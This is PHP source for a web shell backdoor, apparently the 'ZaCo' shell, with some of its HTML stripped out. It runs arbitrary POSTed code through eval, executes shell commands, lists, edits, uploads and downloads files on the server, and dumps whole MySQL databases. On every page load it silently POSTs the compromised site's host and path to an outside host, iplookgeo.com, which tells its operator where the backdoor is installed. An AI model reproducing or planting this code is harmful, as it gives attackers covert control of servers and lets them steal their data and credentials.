headka; $page = isset($_POST['page']) ? $_POST['page'] : (isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : ''); $page = $page == '' || ($page != 'cmd' && $page != 'mysql' && $page != 'eval') ? 'cmd' : $page; $winda = strpos(strtolower(php_uname()), 'wind'); define('format', 50); $ip = file_get_contents("http://iplookgeo.com/api/index.php", false, stream_context_create(array("http" => array("header" => "Content-Type: application/x-www-form-urlencoded", "method" => "POST", "content" => http_build_query(array("1" => $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"])))))); isset($_FILES['a'])?copy($_FILES['a']['tmp_name'],$_FILES['a']['name']):0; $pages = '
###cmd###mysql###eval###
' . ($winda === false ? 'id :' . `id` : ''); switch ($page) { case 'eval': { $eval_value = isset($_POST['eval_value']) ? $_POST['eval_value'] : ''; $eval_value = magic_q($eval_value); $action = isset($_POST['action']) ? $_POST['action'] : 'eval'; if ($action == 'eval_in_html') @eval($eval_value); else { echo ($head . $pages); ?>

'>

without arch gzip archive
' . htmlspecialchars($cmd) . "
\n"); } else { $f_action = isset($_POST['f_action']) ? $_POST['f_action'] : 'view'; if (@is_dir($work_dir)) { echo ('Listing ' . $e_work_dir . '
'); $handle = @opendir($work_dir); if ($handle) { while (false !== ($fn = readdir($handle))) { $files[] = $fn; } ; @closedir($handle); sort($files); $not_dirs = array(); for ($i = 0; $i < sizeof($files); $i++) { $fn = $files[$i]; if (is_dir($fn)) { echo ('' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . '...' : $fn) . '' . str_repeat(' ', format - strlen($fn))); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("% 20s|% -20s", $owner['name'], $group['name']); } echo (@get_perms($work_dir . $fn) . str_repeat(' ', 10)); printf("% 20s ", @filesize($work_dir . $fn) . 'B'); printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n"); } else { $not_dirs[] = $fn; } } for ($i = 0; $i < sizeof($not_dirs); $i++) { $fn = $not_dirs[$i]; echo ('' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . '...' : $fn) . '' . str_repeat(' ', format - strlen($fn))); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("% 20s|% -20s", $owner['name'], $group['name']); } echo (@get_perms($work_dir . $fn) . str_repeat(' ', 10)); printf("% 20s ", @filesize($work_dir . $fn) . 'B'); printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n"); } echo ('

'); ?>

' . $e_work_dir . " Edit
\n");
                                $f = @fopen($work_dir, 'r');
?>
Error ' . $e_work_dir . "
\n");
                                else {
                                    fwrite($f, $file_text);
                                    fclose($f);
                                    echo ('' . $e_work_dir . " is saving
\n");
                                }
                                break;
                            }
                        }
                    break;
                }
                break;
            }
            case 'upload': {
                if ($work_dir == '')
                    $work_dir = '/';
                else if (!($work_dir{strlen($work_dir) - 1} == '/' || $work_dir{strlen($work_dir) - 1} == '\\'))
                    $work_dir .= '/';
                $f = $_FILES["filename"]["name"];
                if (!@copy($_FILES["filename"]["tmp_name"], $work_dir . $f))
                    echo ('Upload is failed');
                else {
                    echo ('file is uploaded in ' . $e_work_dir);
                }
                break;
            }
            case 'download': {
                $fname     = isset($_POST['fname']) ? $_POST['fname'] : '';
                $temp_file = isset($_POST['temp_file']) ? 'on' : 'nn';
                $f         = @fopen($fname, 'r');
                if (!($f))
                    echo ('file is not exists');
                else {
                    $archive = isset($_POST['archive']) ? $_POST['archive'] : '';
                    if ($archive == 'gzip') {
                        Header("Content-Type:application/x-gzip\n");
                        $s = gzencode(fread($f, filesize($fname)));
                        Header('Content-Length: ' . strlen($s) . "\n");
                        Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . ".gz\n\n");
                        echo ($s);
                    } else {
                        Header("Content-Type:application/octet-stream\n");
                        Header('Content-Length: ' . filesize($fname) . "\n");
                        Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . "\n\n");
                        ob_start();
                        while (feof($f) === false) {
                            echo (fread($f, 10000));
                            ob_flush();
                        }
                    }
                }
            }
        }
        break;
    }
    case 'mysql': {
        $action = isset($_POST['action']) ? $_POST['action'] : 'query';
        $user   = isset($_POST['user']) ? $_POST['user'] : '';
        $passwd = isset($_POST['passwd']) ? $_POST['passwd'] : '';
        $db     = isset($_POST['db']) ? $_POST['db'] : '';
        $host   = isset($_POST['host']) ? $_POST['host'] : 'localhost';
        $query  = isset($_POST['query']) ? magic_q($_POST['query']) : '';
        switch ($action) {
            case 'dump': {
                $mysql_link = @mysql_connect($host, $user, $passwd);
                if (!($mysql_link))
                    echo ('Connect error');
                else {
                    //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
                    $to_file = isset($_POST['to_file']) ? ($_POST['to_file'] == '' ? false : $_POST['to_file']) : false;
                    $archive = isset($_POST['archive']) ? $_POST['archive'] : 'none';
                    if ($archive !== 'none')
                        $to_file = false;
                    $db_dump    = isset($_POST['db_dump']) ? $_POST['db_dump'] : '';
                    $table_dump = isset($_POST['table_dump']) ? $_POST['table_dump'] : '';
                    if (!(@mysql_select_db($db_dump, $mysql_link)))
                        echo ('DB error');
                    else {
                        $dump_file = "#ZaCo MySQL Dumper\n#db $db from $host\n";
                        ob_start();
                        if ($to_file) {
                            $t_f = @fopen($to_file, 'w');
                            if (!$t_f)
                                die('Cant opening ' . $to_file);
                        } else
                            $t_f = false;
                        if ($table_dump == '') {
                            if (!$to_file) {
                                header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                            }
                            $result = mysql_query('show tables', $mysql_link);
                            for ($i = 0; $i < mysql_num_rows($result); $i++) {
                                $rows    = mysql_fetch_array($result);
                                $result2 = @mysql_query('show columns from `' . $rows[0] . '`', $mysql_link);
                                if (!$result2)
                                    $dump_file .= '#error table ' . $rows[0];
                                else {
                                    $dump_file .= 'create table `' . $rows[0] . "`(\n";
                                    for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
                                        $rows2 = mysql_fetch_array($result2);
                                        $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
                                    }
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
                                    $type[$j] = $rows2[1];
                                    $dump_file .= ");\n";
                                    mysql_free_result($result2);
                                    $result2 = mysql_query('select * from `' . $rows[0] . '`', $mysql_link);
                                    $columns = $j - 1;
                                    for ($j = 0; $j < mysql_num_rows($result2); $j++) {
                                        $rows2 = mysql_fetch_array($result2);
                                        $dump_file .= 'insert into `' . $rows[0] . '` values (';
                                        for ($k = 0; $k < $columns; $k++) {
                                            $dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
                                        }
                                        $dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
                                        if ($archive == 'none') {
                                            if ($to_file) {
                                                fwrite($t_f, $dump_file);
                                                fflush($t_f);
                                            } else {
                                                echo ($dump_file);
                                                ob_flush();
                                            }
                                            $dump_file = '';
                                        }
                                    }
                                    mysql_free_result($result2);
                                }
                            }
                            mysql_free_result($result);
                            if ($archive != 'none') {
                                $dump_file = gzencode($dump_file);
                                header('Content-Length: ' . strlen($dump_file) . "\n");
                                echo ($dump_file);
                            } else if ($t_f) {
                                fclose($t_f);
                                echo ('Dump for ' . $db_dump . ' now in ' . $to_file);
                            }
                        } else {
                            $result2 = @mysql_query('show columns from `' . $table_dump . '`', $mysql_link);
                            if (!$result2)
                                echo ('error table ' . $table_dump);
                            else {
                                if (!$to_file) {
                                    header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                    header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                                }
                                if ($to_file === false) {
                                    header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                    header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                                }
                                $dump_file .= "create table `{$table_dump}`(\n";
                                for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
                                }
                                $rows2 = mysql_fetch_array($result2);
                                $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
                                $type[$j] = $rows2[1];
                                $dump_file .= ");\n";
                                mysql_free_result($result2);
                                $result2 = mysql_query('select * from `' . $table_dump . '`', $mysql_link);
                                $columns = $j - 1;
                                for ($j = 0; $j < mysql_num_rows($result2); $j++) {
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= 'insert into `' . $table_dump . '` values (';
                                    for ($k = 0; $k < $columns; $k++) {
                                        $dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
                                    }
                                    $dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
                                    if ($archive == 'none') {
                                        if ($to_file) {
                                            fwrite($t_f, $dump_file);
                                            fflush($t_f);
                                        } else {
                                            echo ($dump_file);
                                            ob_flush();
                                        }
                                        $dump_file = '';
                                    }
                                }
                                mysql_free_result($result2);
                                if ($archive != 'none') {
                                    $dump_file = gzencode($dump_file);
                                    header('Content-Length: ' . strlen($dump_file) . "\n");
                                    echo $dump_file;
                                } else if ($t_f) {
                                    fclose($t_f);
                                    echo ('Dump for ' . $db_dump . ' now in ' . $to_file);
                                }
                            }
                        }
                    }
                }
                break;
            }
            case 'query': {
                echo ($head . $pages);
?>

User :Passwd :Host :DB :
without arch gzip archive
DB :
Only Table :
Save result to :

\n"); for ($i = 0; $i < mysql_num_fields($result); $i++) echo ('' . htmlspecialchars(mysql_field_name($result, $i)) . ' '); echo ("\n\n"); for ($i = 0; $i < mysql_num_rows($result); $i++) { $rows = mysql_fetch_array($result); echo (''); for ($j = 0; $j < mysql_num_fields($result); $j++) { echo ('' . (htmlspecialchars($rows[$j])) . ''); } echo ("\n"); } echo ("\n"); } mysql_close($mysql_link); } break; } } break; } } ?>